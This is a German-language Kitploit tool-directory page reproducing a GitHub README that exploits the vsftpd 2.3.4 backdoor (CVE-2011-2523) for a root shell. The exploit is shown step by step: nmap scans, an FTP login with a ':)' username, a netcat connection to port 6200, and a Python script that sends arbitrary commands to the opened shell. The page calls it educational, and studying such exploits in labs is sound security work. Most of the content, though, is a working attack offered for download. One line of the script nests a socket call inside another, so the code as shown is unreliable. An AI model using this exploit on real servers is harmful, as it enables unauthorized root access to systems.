Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) eine kritische Schwachstelle, die zu einer Reverse Root Shell führt. In diesem Repo werde ich einen PoC durchführen, der zeigt, wie man sie Schritt für Schritt ausnutzt – manuell & automatisiert (Python) – zu Bildungszwecken. | Kitploit
Tools/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) eine kritische Schwachstelle, die zu einer Reverse Root Shell führt. In diesem Repo werde ich einen PoC durchführen, der zeigt, wie man sie Schritt für Schritt ausnutzt – manuell & automatisiert (Python) – zu Bildungszwecken.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 6 MonatenNoch nicht geprüft

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) eine kritische Schwachstelle, die zu einer Root-Shell führt. In diesem Repository erstelle ich einen PoC, der zeigt, wie man sie Schritt für Schritt ausnutzt – manuell und automatisiert (Python) – zu Bildungszwecken.

Worum geht es bei der Schwachstelle? Zunächst einmal ist es ein serverseitiger Exploit, den wir remote ausnutzen werden. Die Idee ist: Wenn du dich mit dem FTP-Dienst verbindest, der standardmäßig auf Port 21 läuft, und einen Benutzernamen verwendest, der :) enthält, wird das System dazu veranlasst, einen TCP-Port 6200 mit einer Root-Shell zu öffnen. Jeder kann sich dann damit verbinden und Root-Zugriff auf den Zielserver erhalten – eine Katastrophe. Also lass es uns praktisch Schritt für Schritt durchgehen. Ich erkläre es zuerst manuell, um den vollständigen Überblick zu bekommen, und dann gibt es ein Python-Skript, um es automatisch auszunutzen.

Manuell

Port-Scan

  1. Port 21 ist offen
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
image
  1. Port 6200 ist geschlossen
root@kitploit:~
nmap -p6200 Target_IP
  • Port 6200 ist vorerst geschlossen image

Ausnutzung

  1. Verbinde dich mit dem FTP-Dienst und verwende einen bösartigen Benutzernamen, um das System dazu zu bringen, Port 6200 zu öffnen
root@kitploit:~
ftp Target_IP 
  • Benutzername: anything:)
  • Passwort: anything image
  1. Überprüfe Port 6200 nach der FTP-Verbindung
root@kitploit:~
nmap -p6200 Target_IP

Port 6200 ist jetzt offen, das ist also unsere Backdoor.

image
  1. Verbinde dich mit Port 6200, um eine Root-Shell auf dem gesamten Server zu erhalten
root@kitploit:~
nc -nv Target_IP 6200

Schließlich haben wir eine Root-Shell auf dem Zielsystem. image


Automatisch

Nachdem wir es manuell gemacht haben, kennen wir die Exploit-Schritte:

  1. Verbinde dich mit dem FTP-Server auf Port (21).
  2. Verwende einen Benutzernamen, der :) enthält, um die Backdoor auszulösen.
  3. Verbinde dich mit Port (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Tool herunterladen